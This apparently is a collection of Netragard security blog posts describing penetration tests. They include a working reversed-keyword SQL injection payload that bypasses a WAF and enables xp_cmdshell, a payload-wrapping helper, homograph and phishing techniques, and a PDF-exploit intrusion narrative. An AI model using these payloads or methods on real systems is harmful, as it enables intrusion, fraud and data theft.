Monday, June 14, 2010

Security Vulnerability Penetration Assessment Test?

Our philosophy here at Netragard is that security-testing services must produce a threat that is at least equal to the threat that our customers are likely to face in the real world. If we test our customers at a lesser threat level and they are later attacked by a more capable threat, then they will likely suffer a compromise. If they do suffer a compromise, then the money that they spent on testing services might as well be added to the cost in damages that result from the breach.
This is akin to how armor is tested. Armor is designed to protect something from a specific threat. To be effective, the armor is exposed to a level of threat that is slightly higher than what it will likely face in the real world. If the armor is penetrated during testing, it is enhanced and hardened until the threat can no longer defeat it; if armor is penetrated in battle, there are casualties. That class of testing is called Penetration Testing, and the level of threat produced has a very significant impact on test quality and results.

What is particularly scary is that many of the security vendors who offer Penetration Testing services either don't know what Penetration Testing is or don't know the definitions of the terms. Many security vendors confuse Penetration Testing with Vulnerability Assessments, and that confusion translates to the customer. The terms are not interchangeable and they do not define methodology; they only define the class of testing. So before we can discuss service quality and threat, we must first properly define the services.

Based on the English dictionary, the word "Vulnerability" is best defined as susceptibility to harm or attack; being vulnerable is the state of being exposed. The word "Assessment" is best defined as the means by which the value of something is estimated or determined, usually through testing. As such, a "Vulnerability Assessment" is a best estimate of how susceptible something is to harm or attack.

Let's do the same for "Penetration Test". The word "Penetration" is best defined as the act of entering into or through something, or the ability to make way into or through something. The word "Test" is best defined as the means by which the presence, quality, or genuineness of anything is determined. As such, the term "Penetration Test" means to determine the presence of points where something can make its way into or through something else.

Despite what many people think, neither term is specific to Information Technology. Penetration Tests and Vulnerability Assessments existed well before the advent of the microchip. In fact, the ancient Romans used a form of penetration testing to test their armor against various types of projectiles. Today, we perform Structural Vulnerability Assessments against things like the Eiffel Tower and the Golden Gate Bridge. Vulnerability Assessments are chosen because Structural Penetration Tests would damage, or possibly destroy, the structure.

In the physical world, Penetration Testing is almost always destructive (at least to a degree), but in the digital world it isn't destructive when done properly. This is mostly because in the digital world we're penetrating a virtual boundary, while in the physical world we're penetrating a physical one. When you penetrate a virtual boundary you're not really creating a hole; you're usually creating a process in memory that can be killed or otherwise removed.

When applied to IT Security, a Vulnerability Assessment isn't as accurate as a Penetration Test. This is because Vulnerability Assessments are best estimates, while Penetration Tests either penetrate or they don't. As such, a quality Vulnerability Assessment report will contain few false positives (false findings), while a quality Penetration Testing report should contain no false positives at all (though it may contain theoretical findings).

The quality of service is determined by the talent of the team delivering the services and by the methodology used for service delivery. A team of research-capable ethical hackers with a background in exploit development and system / network penetration will usually deliver higher-quality services than a team that is not research capable. If a team claims to be research capable, ask them for example exploit code that they've written and for advisories that they've published.

Service quality is also directly tied to threat capability. The threat in this case is defined by the capability of real world malicious hackers. If testing services do not produce a threat level that is at least equal to the real world threat, then the services are probably not worth buying. After all, the purpose for security testing is to identify risks so that they can be fixed / patched / eliminated before malicious hackers exploit them. But if the security testing services are less capable than the malicious hacker, then chances are the hacker will find something that the service missed.

Friday, June 11, 2010

We Are Politically Incorrect


Back in February of 2009 we released an article called "FaceBook from the hacker's perspective". As far as we know, we were the first to publish a detailed article about using Social Networking websites to deliver surgical Social Engineering attacks. Since that time, we've noticed a significant increase in marketing hype around Social Engineering from various other security companies. The problem is that they're not telling you the whole truth.

The whole truth is that Social Engineering is a necessary but potentially dangerous service. Social Engineering at its roots is the act of exploiting human vulnerability, and as such it is an offensive and politically incorrect service. If a customer's business has any pre-existing social or political issues, then Social Engineering can be like putting a match to a powder keg. In some cases the damages can be serious and can result in legal action between employee and employer, or vice versa.

It's for this reason that businesses need to make sure that their environments are ready to receive social attacks, and that they are prepared to deal with the emotional consequences that might follow. If employees are trained properly and security policies that cover the social vector are enforced, then things "should" be OK. If those policies don't exist and there is any internal turmoil, any high-risk employee, or any potentially delicate political situation, then Social Engineering is probably not such a great idea, as it will likely identify and exploit one of those pre-existing issues.

For example, we recently delivered services to a customer that had pre-existing issues but assumed that their environment was safe for Social Engineering testing. In this particular case the customer had an employee, whom we'll call Jane Doe, who was running her own business on the side. Jane Doe was advertising her real employer's name on her business website, making it appear as if there were a relationship between her employer and her business. She was also listing her employer's address as her business address on her FaceBook fan page. From our perspective, Jane Doe was a perfect Social Engineering target.

With this social risk identified, we decided that we’d impersonate Jane Doe and hijack the existing relationships that she had with our customer (her employer). We accomplished this with a specially crafted phishing attack.

The first step in the phish was to collect content for the phishing email. In this case Jane Doe had posted images to her FaceBook fan page, including a photo of herself and a copy of her business's logo. We used those images to create an email that looked like it originated from Jane Doe's email address on our customer's network and offered the recipient discounted pricing. (Her FaceBook privacy settings were set to allow everybody.)

Once we had the content for the phishing email set up, we used an IDN homograph attack to register a new domain that appeared identical to our customer's domain. For example, if our customer were SNOsoft and their real domain were snosoft.com, the fake domain looked just like "snosoft.com".
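For illustration only (using the made-up SNOsoft name from above, not any real registration), a homograph lookalike takes just a couple of lines of Python; the Cyrillic "о" (U+043E) renders identically to the Latin "o" in most fonts:

```python
# Hypothetical homograph of "snosoft.com": the Latin "o" is swapped
# for the visually identical Cyrillic "о" (U+043E).
real = "snosoft.com"
fake = "sn\u043esoft.com"

print(real == fake)         # False: same glyphs on screen, different code points
print(fake.encode("idna"))  # the punycode (xn--) form that actually gets registered
```

The registrar only ever sees the punycode form, while the victim's browser or mail client displays the lookalike glyphs.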

We embedded a link into the phishing email using the fake domain to give it a legitimate look and feel. The link was advertised as the place to click for information about specially discounted offerings specific to our customer's employees. Of course, the link really pointed to our web server, where we were hosting a browser-based exploit.

Then we collected email addresses using an enumerator and loaded them into a distribution list. We sent a test email to ourselves first to make sure that everything would render correctly. Once our testing was complete, we clicked send and the phish was on its way. Within 15 minutes of delivering the attack, our customer called us and requested that all testing be stopped. By that time, 38 people had already clicked our embedded URL, and more clicks were on the way.

As it turns out, our customer wasn't prepared to receive Social Engineering tests, despite the fact that they had requested them. At first they accused us of being unprofessional because we used Jane Doe's picture in the phishing email, which was apparently embarrassing to Jane Doe. Then they accused us of being politically incorrect for the same reason.

So we asked our customer, "Do you think that a black-hat would refrain from doing this because it's politically incorrect?" Then we said, "Imagine if a black-hat had launched this attack and received 38 clicks (and counting)." (Each click represents a potential compromise.)

While we can’t go into much more detail for reasons of confidentiality, the phishing attack uncovered other more serious internal and political issues. Because of those issues, we had to discontinue testing and move to report delivery. There was no fault or error on our part as everything was requested and authorized by the customer, but this was certainly a case of the match and the powder keg.

Despite the unfortunate circumstances, the customer did benefit significantly from the services. Specifically, the customer became aware of some very serious social risks that would have been extremely damaging had they been identified and exploited by black-hat hackers. Even though it was a painful process for the customer, we're happy that we delivered the services as we did, because they enabled our customer to reduce their overall risk and exposure profile.

The moral of the story is that businesses should take care and caution when requesting Social Engineering services. They should be prepared for uncomfortable situations and discoveries, and if possible they should train and prepare their employees in advance. In the end, it boils down to one question: is it more important for a company to understand its risks, or to avoid embarrassing or offending an employee?

Sunday, May 16, 2010

REVERSE(noitcejnI LQS dnilB) Bank Hacking

Earlier this year we were hired to perform an Overt Web Application Penetration Test for one of our banking customers (did you click that?). This customer is a recurring customer, so we know that they have Web Application Firewalls and Network Intrusion Prevention Systems in play. We also know that they are very security savvy and that they respond to attacks promptly and appropriately.


Because this test was Overt in nature (non-stealth), we began by configuring Acunetix to use burpsuite-pro as a proxy. Then we ran an automated Web Application Vulnerability Scan with Acunetix and watched the scan populate burpsuite-pro with information. While the scan results were mostly fruitless, we were able to pick up with manual testing in burpsuite-pro.

While the automated scans didn't find anything, our manual testing identified an interesting Blind SQL Injection Vulnerability. It was the only vulnerability we discovered that had any real potential.

It's important to understand the difference between standard SQL Injection Vulnerabilities and Blind SQL Injection Vulnerabilities. A standard SQL Injection Vulnerability returns useful error information to the attacker, usually displaying it in the attacker's web browser. That information helps the attacker debug and refine the attack. Blind SQL Injection Vulnerabilities return nothing, which makes them much more difficult to exploit.

Since the target Web Application was protected by two different Intrusion Prevention Technologies, and since the vulnerability was a Blind SQL Injection Vulnerability, we knew that exploitation wasn’t going to be easy. To be successful we’d first need to defeat the Network Intrusion Prevention System and then the Web Application Firewall.

Defeating Network Intrusion Prevention Systems is usually fairly easy. The key is to find an attack vector that the Network Intrusion Prevention System can't monitor. In this case (like most cases), our target Web Application's server accepted connections over SSL (via HTTPS). Because SSL traffic is encrypted, the Network Intrusion Prevention System can't intercept and analyze it.

Defeating Web Application Firewalls is a bit more challenging. In this case, the Web Application Firewall was the termination point for the SSL traffic and so it didn’t suffer from the same SSL blindness issues that the Network Intrusion Prevention System did. In fact, the Web Application Firewall was detecting and blocking our embedded SQL commands very successfully.

We tried some of the known techniques for bypassing Web Application Firewalls but to no avail. The vendor that makes this particular Web Application Firewall does an excellent job at staying current with the latest methods for bypassing Web Application Firewall technologies.

Then we decided that we'd try attacking backwards. Most SQL databases support a reverse function. That function does just what you'd think it would do: it returns the reverse of whatever string you feed it. So we wrote our commands backwards and encapsulated them in the reverse() function provided by the SQL server. When we fed the new reversed payloads to the Web Application, the Web Application Firewall failed to block them.

As it turns out, most (maybe all) Web Application Firewalls can be bypassed if you reverse the spelling of your SQL commands. So you rewrite "xp_cmdshell" as "llehsdmc_px" and then encapsulate it in the reverse function. As far as we know, we're the first to discover and use this method to successfully bypass a Web Application Firewall.
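The wrapping step is easy to automate. Here's a minimal, hypothetical sketch in Python (assuming a Microsoft SQL Server backend, whose REVERSE() and EXEC() the technique relies on):

```python
def reverse_wrap(sql: str) -> str:
    """Store a SQL statement backwards so keyword-matching WAF signatures
    never see it in forward order; REVERSE() restores it server-side."""
    return (
        "DECLARE @s varchar(200) "
        f"SET @s = REVERSE('{sql[::-1]}') "
        "EXEC (@s)"
    )

# The forward keyword never appears in the payload that crosses the wire.
print(reverse_wrap('master.dbo.sp_configure "xp_cmdshell", 1'))
```

A WAF scanning for "xp_cmdshell" only ever sees "llehsdmc_px", which matches no signature.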

The next step in the attack was to reconfigure and enable the xp_cmdshell function. xp_cmdshell is important because it executes a given command string as an operating-system command shell and returns any output as rows of text. Simply put, it's just like sitting at the DOS prompt.

The technique used to reconfigure the xp_cmdshell functionality is well known and well documented. But since we did it using backwards commands, we thought we'd show you what it looked like.

var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@b) RECONFIGURE SET @c = REVERSE('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--

The above SQL commands do the following three things:

1-) master.dbo.sp_configure "show advanced options", 1

Use the “show advanced options” option to display the sp_configure system stored procedure advanced options. When you set show advanced options to 1, you can list the advanced options by using sp_configure. The default is 0. The setting takes effect immediately without a server restart.

2-) master.dbo.sp_configure "xp_cmdshell", 1

This enables the xp_cmdshell functionality in the MsSQL database so that we can execute operating-system commands by calling xp_cmdshell. xp_cmdshell is disabled by default.

3-) C:\> ping netragard.com

Because we were dealing with a Blind SQL Injection Vulnerability, we needed a creative way to verify that we'd successfully re-enabled the xp_cmdshell function. To do that, we set up a sniffer on our outside firewall interface and configured it to alert us when we received pings from our banking customer's network. In the SQL payload (shown above) we included the command "ping netragard.com", so when ICMP packets arrived from our customer's network, we knew that our command had been executed successfully.

Now that we had confirmed that our Blind Reversed SQL Injection attack was viable and that we had successfully enabled the xp_cmdshell functionality, the last thing for us to do was to extract database information. But how do we extract database information using a Blind SQL Injection Vulnerability if the vulnerability never returns any information?

That's actually pretty easy. Most databases support conditional statements (if condition, then do something), so we combined conditional statements with timing to extract database information. Specifically: if the table name equals "users", wait for 3 seconds; if it doesn't, return control immediately. If the database doesn't respond for 3 seconds, we know that we've guessed the name of one of the tables correctly.
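The timing logic can be sketched in a few lines of Python. The vulnerable web request is simulated here by a stand-in function (a real engagement would time an actual HTTPS request), and the injected condition is the T-SQL IF/WAITFOR construct described above:

```python
import time

DELAY = 0.3  # simulated delay; the real payload used WAITFOR DELAY '0:0:3'

def send_request(payload: str) -> None:
    # Stand-in for the vulnerable application: it stalls only when the
    # guessed table name is right, just as the real server stalls when
    # the injected IF condition evaluates to true.
    if "users" in payload:
        time.sleep(DELAY)

def table_exists(name: str) -> bool:
    # A slow response means the injected condition was true.
    payload = f"1'; IF EXISTS(SELECT * FROM {name}) WAITFOR DELAY '0:0:3';--"
    start = time.monotonic()
    send_request(payload)
    return time.monotonic() - start >= DELAY

print(table_exists("users"))     # True: the response stalled
print(table_exists("accounts"))  # False: control returned immediately
```

Repeating this guess-and-time loop is how entire table and column names can be extracted through a vulnerability that never returns a single byte of data.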

Sure there are other things that we could have done, but we're the good guys.

Monday, April 26, 2010

Netragard Hacking Your Bank

We were recently hired to perform an interesting Advanced Stealth Penetration Test for a mid-sized bank. The goal of the penetration test was to penetrate the bank's IT Infrastructure and see how far we could get without detection. This is a bit different from most penetration tests, as we weren't tasked with identifying risks so much as with demonstrating vulnerability.

The first step of any penetration test is reconnaissance. Reconnaissance is the military term for the passive collection of intelligence about an enemy prior to attacking that enemy. It is nearly impossible to attack an enemy effectively without first obtaining actionable intelligence about that enemy. Failure to collect good intelligence can result in significant casualties, unnecessary collateral damage, and a completely failed attack. In penetration testing, damages are realized as downed systems and lost revenue.

Because this engagement required stealth, we focused on the social attack vectors and Social Reconnaissance. We first targeted FaceBook with our "FaceBook from the hacker's perspective" methodology. That enabled us to map relationships between employees, vendors, friends, family, etc. It also enabled us to identify key people in Accounts Receivable / Accounts Payable ("AR/AP").

In addition to FaceBook, we focused on websites like Monster, Dice, Hot Jobs, LinkedIn, etc. We identified a few interesting IT related job openings that disclosed interesting and useful technical information about the bank. That information included but was not limited to what Intrusion Detection technologies had been deployed, what their primary Operating Systems were for Desktops and Servers, and that they were a Cisco shop.

Naturally, we thought it was also a good idea to apply for a job to see what else we could learn. To do that, we created a fake resume designed to be the "perfect fit" for a "Sr. IT Security Position" (one of the opportunities available). Within one day of submitting our fake resume, we had a telephone screening call scheduled.

We started the screening call with the standard meet and greet, and an explanation of why we were interested in the opportunity. Once we felt that the conversation was flowing smoothly, we began to dig in a bit and start asking various technology questions. In doing so, we learned what Anti-Virus technologies were in use and we also learned what the policies were for controlling outbound network traffic.

That’s all that we needed…

Upon completion of our screening call, we had sufficient information to attempt stealth penetration with a high probability of success. The beauty is that we collected all of this information without sending a single packet to our customer’s network. In summary we learned:

  • That the bank uses Windows XP for most Desktops
  • Who some of the bank's vendors were (IT Services)
  • The names and email addresses of people in AR/AP
  • What Anti-Virus technology the bank uses
  • Information about the bank's traffic control policies

Based on the intelligence that we collected, we decided that the ideal scenario for stealth penetration would be to embed an exploit into a PDF document and to send that PDF to the bank's AR/AP department from the bank's trusted IT Services provider. The attack was designed to exploit the trust that our customer had in their existing IT Services provider.

When we created the PDF, we used the new reverse https payload that was recently released by the Metasploit Project. (Previously we were using similar but more complex techniques for encapsulating our reverse connections in HTTPS). We like reverse HTTPS connections for two reasons:

  • First, Intrusion Detection Technologies cannot monitor encrypted network traffic. Using an encrypted reverse connection ensures that we are protected from the prying eyes of Intrusion Detection Systems and less likely to trip alarms.
  • Second, most companies allow outbound HTTPS (port 443) because it's required to view many websites. The reverse HTTPS payload that we used mimics normal web-browsing behavior and so is much less likely to set off any Intrusion Detection events.
Before we sent the PDF to our customer, we checked it against the same Antivirus Technology that they were using to ensure that it was not detected as malware or a virus. To evade the scanners, we had to "pack" our pseudo-malware in such a way that it would not be detected. Once that was done and tested, we were ready to launch our attack.

When we sent the PDF to our customer, it didn't take long for the victim in AP/AR to open it; after all, it appeared to be a trusted invoice. Once it was opened, the victim's computer was compromised. It then established a reverse connection to our lab, which we tunneled into to take control of the victim's computer (all via HTTPS).

Once we had control, our first order of business was to maintain access. To do this, we installed our own backdoor technology on the victim's computer. Our backdoor also used outbound HTTPS connections, but for authenticated command retrieval, so if our control connection to the victim's computer was lost, we could simply tell our backdoor to re-establish it.

The next order of business was to deploy our suite of tools on the compromised system and begin scoping out the internal network. We used selective ARP poisoning as a first method of internal reconnaissance. That proved very useful, as we were able to quickly identify VNC connections and capture VNC authentication packets. As it turned out, the VNC connections that we captured were being made to the Active Directory ("AD") server.

We were able to crack the VNC password using a VNC cracking tool. Once that happened, we were able to access the AD server and extract the server's SAM file. We then successfully cracked all of the passwords in that file, including the historical user passwords. Once the passwords were cracked, we found that the same credentials were used across multiple systems. As such, we were able to access not only desktops and servers but also Cisco devices, etc.

In summary, we were able to penetrate our customer's IT Infrastructure and effectively take control of the entire infrastructure without being detected. We accomplished that by avoiding conventional penetration methods and by using our own unorthodox, yet obviously effective, penetration methodologies.

This particular engagement was interesting because our customer's goal was not to identify all points of risk, but to see how deeply we could penetrate. Since the engagement, we've worked with that customer to help them create barriers of isolation in the event of a penetration. Since those barriers were implemented, we haven't been able to penetrate as deeply.

As usual, if you have any questions or comments, please leave them on our blog. If there’s anything you’d like us to write about, please email me the suggestion. If I’ve made a grammatical mistake in here… I’m a hacker not an English major.

Tuesday, April 6, 2010

Outbound Traffic Risk and Controls

Recently one of our customers asked me to provide them with information about the risks of unrestricted or lightly restricted outbound network traffic. As such, I decided to write this blog entry and share it with everyone. While some of the risks behind loose outbound network controls are obvious, others aren’t so obvious. I hope that this blog entry will help to shed some light on the not so obvious risks…

In all networks, there are two general types of network traffic, inbound and outbound. Inbound network traffic is the type of traffic that is generated when an Internet based user makes a network connection to a device that exists in your business infrastructure. Examples of such connections are browsing to your website, establishing a VPN connection, checking email, etc. Outbound network traffic is the type of traffic that is generated when a LAN based user (or a VPN connected user in some cases) makes a network connection to a device somewhere on the Internet.

Just about everyone is familiar with the risks that are associated with the inbound type. Those risks include things like Vulnerable Web Applications, unpatched services running on Internet facing production systems, etc. In fact, most people associate the idea of security with the inbound connection type more so than the outbound type. As a result, they end up leaving the most vulnerable part of their business open to attack.

The truth is that the size of the attack surface for the outbound connection type is considerably larger than that of the inbound connection type. The attack surface is best defined as the sum of all potential risk points for a particular group of targets. In the case of the outbound connection type, the potential risk points include every variant of software installed on every device capable of making outbound connections (and helper applications too). This includes technologies like Adobe Acrobat, Mozilla Firefox, Internet Explorer, Flash, QuickTime, Microsoft Office, Safari, FTP Programs, Security Scanners, Antivirus Technologies, Smartphones, etc.

One example of an attack goes something like this: an employee receives an email containing an interesting blog entry from Netragard, LLC. That email contains a link that points to a malicious payload designed to compromise the employee's computer. When the link is clicked, a request is made to download the payload, which results in the employee's computer being compromised. Upon compromise, the employee's computer establishes an outbound *HTTPS connection to the attacker, and the attacker tunnels back in over that connection to take control of the employee's computer. In most cases, the employee has no idea that they've been compromised, nor does their employer.

*Because the connection is an HTTPS connection, IDS/IPS technologies won't flag it as suspicious, nor is it possible to sniff the connection, since it's encrypted with SSL. (SNOsoft's Jayson Street)

The compromise doesn't stop at the employee's computer. The instant the employee's computer is compromised, the network that it is connected to is compromised as well. At that point the attacker can use ARP Poisoning to perform Man-in-the-Middle attacks (or other, more direct attacks), or simply capture user credentials. Either way, distributed metastasis is almost inevitable if the attacker has any semblance of skill. (Thank god Netragard didn't really embed a malicious link in this blog entry, right?)

The good news is that suffering a compromise doesn’t need to be costly or technically damaging. If the proper policies, procedures and controls are in place then a compromise can be relatively harmless from a cost in damages perspective. Outbound connection controls are an example of controls that everyone should have in place.

If outbound connections are restricted to specific protocols and can only be established by authenticated users, then attacks like the one described above will be largely ineffective. The outbound controls might not always prevent the user's computer from being compromised, but they will usually prevent the user's computer from establishing a connection back to the attacker (which will, ideally, prevent the attacker from taking control of it). In such a case, the computer will need to be reinstalled, but at least the rest of the network will still be intact.

Sunday, March 28, 2010

Exploit Acquisition Program - More Details

The recent news on Forbes about our Exploit Acquisition Program has generated a lot of interesting speculative controversy and curiosity. As a result, I've decided to take the time to follow up with this blog entry. Here I'll make a best effort to explain what the Exploit Acquisition Program is, why we decided to launch the program, and how the program works.

What it is:

The Exploit Acquisition Program ("EAP") officially started in May of 1999 and is currently run by Netragard, LLC. The EAP is specifically designed to acquire "actionable research," in the form of working exploits, from the security community. The Exploit Acquisition Program is different from other programs because participants receive significantly higher pay for their work, and in most cases the exploits never become public knowledge.

The exploits that are acquired via the EAP are sold directly to specific US based clients that have a unique and justifiable need for such technologies. At no point does Netragard sell or otherwise export acquired exploits to any foreign entities. Nor do we disclose any information about our buyers or about participating researchers.

Why did we start the EAP?

Netragard launched the EAP to give security researchers the opportunity to receive fair value for their research product. Our bidding prices start at or around $15,000 per exploit. That price is affected by many different variables.

How does the EAP Work?

The EAP works as follows:
  1. Researcher contacts Netragard.
  2. Researcher and Netragard execute a Mutual Nondisclosure Agreement.
  3. Researcher provides a verifiable form of identification to Netragard.
  4. Researcher fills out an Exploit Acquisition Form ("EAF").
  5. Netragard works with the buyer to determine exploit value based on the information provided in the EAF.
  6. Researcher accepts or rejects the price. Note: If rejected, the process stops here.
  7. Researcher submits the exploit code and vulnerability details to Netragard.
  8. Netragard verifies that the exploit works as advertised.
  9. If the exploit does not work as advertised then the researcher is given the opportunity to resolve the issue(s).
  10. If the exploit does work as advertised then the purchase agreement is delivered to the researcher.
  11. Researcher executes purchase agreement and transfers all rights and ownership of the exploit and any information related to the exploit to Netragard. At this point researcher loses all rights to the exploit and its respective information.
  12. Netragard begins the payment process.
  13. Payments are issued in three equal installments over the course of three months.
EAP Rules
  1. Netragard requires exclusivity for all exploits purchased through the EAP.
  2. Ownership of the exploit and its respective vulnerability information is transferred from researcher to Netragard at step 11 above. Prior to step 11 the exploit and its respective vulnerability information are the intellectual property of the researcher. If at any point before step 11 the researcher terminates the acquisition process, then Netragard will destroy any and all information related to the failed transaction. Termination of sale is not possible after step 11.
  3. Netragard will not identify its buyers.
  4. Netragard will not identify researchers.
  5. All transactions between the buyer, Netragard, and the researcher are conducted legally and contractually. At no point will Netragard engage in illegal activity or deal with unknown, untrusted, and/or unverifiable sources or entities.
If you are interested in selling your exploit to us, please contact us at eap@netragard.com.

Thursday, March 4, 2010

Professional Script Kiddies vs Real Talent

The Good Guys in the security world are no different from the Bad Guys; most of them are nothing more than glorified Script Kiddies. The fact of the matter is that if you took all of the self-proclaimed hackers in the world and subjected them to a litmus test, very few would pass as actual hackers.

This is true for both sides of the so-called Black and White hat coin. In the Black Hat world, you have script kiddies who download programs written by other people and then use those programs to “hack” into networks. The White Hats do the exact same thing; only they buy the expensive tools instead of downloading them for free. Or maybe they’re actually paying for the pretty GUI, who knows?

What is pitiable is that in just about all cases these script kiddies have no idea what the programs actually do. Sometimes that’s because they don’t bother to look at the code, but most of the time it’s because they just can’t understand it. If you think about it, that is scary. Do you really want to work with a security company that launches attacks against your network with tools that it does not fully understand? I sure wouldn’t.

This is part of the reason why I feel it is so important for any professional security services provider to maintain an active research team. I’m not talking about doing market research and pretending that it’s security research, like so many security companies do. I’m talking about doing actual vulnerability research and exploit development to help educate people about risks for the purposes of defense. After all, if a security company can’t write an exploit, then what business does it have launching exploits against your company?

I am very proud to say that Everything Channel recently released the 2010 CRN Security Researchers list and that Netragard’s Kevin Finisterre was on it. The list also includes people for whom I have the utmost respect. As far as I am concerned, these are some of the best guys in the industry (clearly this list is not all-inclusive and in no way includes all of the people who deserve credit for their contributions and/or talent):

  • Dino Dai Zovi
  • Kevin Finisterre
  • Landon Fuller
  • Robert Graham
  • Jeremiah Grossman
  • Larry Highsmith
  • Billy Hoffman
  • Mikko Hypponen
  • Dan Kaminsky
  • Paul Kocher
  • Nate Lawson
  • David Litchfield
  • Charles Miller
  • Jeff Moss
  • Jose Nazario
  • Joanna Rutkowska

In the end I suppose it all boils down to what the customer wants. Some customers want to know their risks; others just want to put a check in the box. For those who want to know what their real risks are, you’ve come to the right place.

Monday, October 12, 2009

Hosted Solutions – A Hacker's Haven

Human beings are lazy by nature. If there is a choice to be made between a complicated technology solution and an easy technology solution, then nine times out of ten people will choose the easy solution. The problem is that easy solutions are often riddled with hidden risks, and those risks can end up costing the consumer more money in damages than what might be saved by using the easy solution.

The advantages of using a managed hosting provider to host your email, website, telephone systems, etc, are clear. When you outsource critical infrastructure components you save money. The savings are quickly realized because you no longer need to spend money running a full scale IT operation. In many cases, you don’t even need to worry about purchasing hardware, software, or even hiring IT staff to support the infrastructure.

What isn’t clear to most people is the serious risk that outsourcing can introduce to their business. In nearly all cases a business will have a radically lower risk and exposure profile if they keep everything in-house. This is true because of the substantial attack surface that hosting providers have when compared to in-house IT environments.

For example, a web-hosting provider might host 1,000 websites across 50 physical servers, or 20 websites per server. If one of those websites contains a single vulnerability and that vulnerability is exploited by a hacker, then the hacker will likely take control of the entire server. At that point the hacker will have successfully compromised and taken control of all 20 websites on that server with a single attack.

In non-hosted environments there might be only one Internet-facing website, as opposed to the 1,000 that exist in a hosted environment. As such, the attack surface in this example would be 1,000 times greater in a hosted environment than in a non-hosted environment. In a hosted environment, the risks that other customers introduce to the infrastructure also become your risk. In a non-hosted environment you are only impacted by your own risks.
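The arithmetic above can be put into a toy model. This is a deliberate simplification that treats every site as equally exposed, and the figures (1,000 sites, 50 servers) are the illustrative numbers from the example, not measurements of any real provider:

```python
# Toy model of the shared-hosting attack surface described above.
total_sites = 1000    # websites hosted by the provider
total_servers = 50    # physical servers they run on
in_house_sites = 1    # a typical non-hosted, in-house deployment

# Number of co-tenants that share a server with any given site.
sites_per_server = total_sites // total_servers

# A vulnerability in any co-hosted site can compromise your server;
# provider-wide, any of the 1,000 sites is a potential way in.
surface_ratio = total_sites // in_house_sites

print(f"{sites_per_server} sites share each server")
print(f"hosted attack surface: {surface_ratio}x the in-house surface")
```

In other words, even before considering the provider's own infrastructure, your site inherits the risk of the 19 strangers sharing its server.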

To make matters worse, many people assume that such a risk isn’t significant because they do not use their hosted systems for any critical transactions. They fail to consider the fact that a hacker can modify the contents of the compromised system. These modifications can include redirecting online banking portal links, altering credit card form posting links, or spreading infectious malware. While this is true for any compromised system, the chances of suffering a compromise in a hosted environment are much greater than in a non-hosted environment.

Tuesday, September 22, 2009

Social Engineering – It’s Nothing New

With all the recent hype about Social Engineering, we figured we’d chime in and tell people what’s really going on. The fact is that Social Engineering is nothing more than a Confidence Trick carried out by a Con Artist. The only difference between the terms Social Engineering and Confidence Trick is that Social Engineering is predominantly used in relation to technology.

So what is it really? Social Engineering is the act of exploiting a person’s natural tendency to trust another person or entity. Because the vulnerability exists within people, there is no truly effective method for remediation. That is not to say that you cannot protect your sensitive data, but it is to say that you cannot always prevent your people or even yourself from being successfully conned.

The core ingredients required to perform a successful confidence trick are no different today than they were before the advent of the Internet. The con artist must earn the victim’s trust, and then trick the victim into performing an action or divulging information. The Internet certainly didn’t create the risk, but it does make it easier for the threat to align with the risk.

Before the advent of the Internet, the con artist (threat) needed to contact the victim (risk) via telephone, in person, via snail mail, etc. Once contact was made, a good story needed to be put into place and the victim’s trust needed to be earned. That process could take months or even years, and even then success wasn’t guaranteed.

The advent of the Internet provided the threat with many more avenues through which it could successfully align with the risk. Specifically, the Internet enables the threat to align with hundreds or even thousands of risks simultaneously. That sort of shotgun approach couldn’t be done before, and it significantly increases an attacker’s chances of success. One of the most elementary examples of this shotgun approach is the email-based phishing attack.

The email-based phishing attack doesn’t earn the trust of its victims; it steals trust from existing relationships. Those relationships might exist between the victim and their bank, a family member, a co-worker, an employer, etc. In all instances the email-based phishing attack hinges on the attacker’s ability to send emails that look like they are coming from a trusted source (exploitation of trust). From a technical perspective, email spoofing and phishing are trivial.
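As a minimal illustration of why header-level spoofing is trivial, the sketch below builds a message with a forged From header using Python's standard library. The addresses are hypothetical placeholders; the point is that nothing in the message format itself validates the claimed sender (that job falls to downstream controls such as SPF, DKIM, and DMARC):

```python
from email.message import EmailMessage

# Build a message whose From header claims to be a trusted sender.
# All addresses here are hypothetical placeholders.
msg = EmailMessage()
msg["From"] = "ceo@trusted-company.example"   # attacker-chosen; the format doesn't verify it
msg["To"] = "victim@target.example"
msg["Subject"] = "Urgent: please review the attached report"
msg.set_content("Please open the attached report before end of day.")

# This is the sender string a naive mail client would display.
print(msg["From"])
```

Actually delivering such a message is a separate step, and receiving servers increasingly reject mail that fails SPF/DKIM/DMARC checks, but composing the forged header itself costs the attacker nothing.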

The reason why it is possible for an attacker to steal trust from a victim instead of earning that trust is because “face to face” trust isn’t portable to the Internet. For example, most people trust their spouse. Many people talk to their spouse on AIM, MSN, Yahoo, Skype, etc. while at work. How do they know that they are really chatting with their spouse and not a hacker?

So how do you protect against the social risks and prevent the threat from successfully aligning with those risks? The truth is that you can't. Con artists have been conning people since the dawn of man. The better question is: what are you doing to protect your data from the hacker who does penetrate your IT infrastructure?



Friday, July 24, 2009

Why “DISSECTING THE HACK: The F0rb1dd3n Network” was written. By: Jayson E. Street

Note: This blog entry was written by Jayson E. Street and published on his behalf.

The consumer, the corporate executive, and the government official. Regardless of your perspective, DISSECTING THE HACK: The F0rb1dd3n Network was written to illustrate the issues of Information Security through story. We all tell stories. In fact, we do our best communicating through stories. This book illustrates how very real twenty-first century threats are woven into the daily lives of people in different walks of life.

Three kids in Houston, Texas. A mid-level Swiss businessman traveling abroad. A technical support worker with a gambling problem. An international criminal who will do anything for a profit (and maybe other motives). FBI agents trying to unravel a dangerous puzzle. A widower-engineer just trying to survive. These are just some of the lives brought together in a story of espionage, friendship, puzzles, hacks, and more. Every attack is real. We even tell you how some of these attacks are done. And we tell you how to defend against varied attacks as well.

DISSECTING THE HACK: The F0rb1dd3n Network is a two-part work. The first half is a story that can be read by itself. The second half is a technical reference work that can also be read alone. But together, each provides texture and context for the other. The technical reference – called the STAR or “Security Threats Are Real” – explains the “how” and “why” behind much of the story. STAR addresses technical material, policy issues, hacker culture context, and even explains “Easter Eggs” in the story.

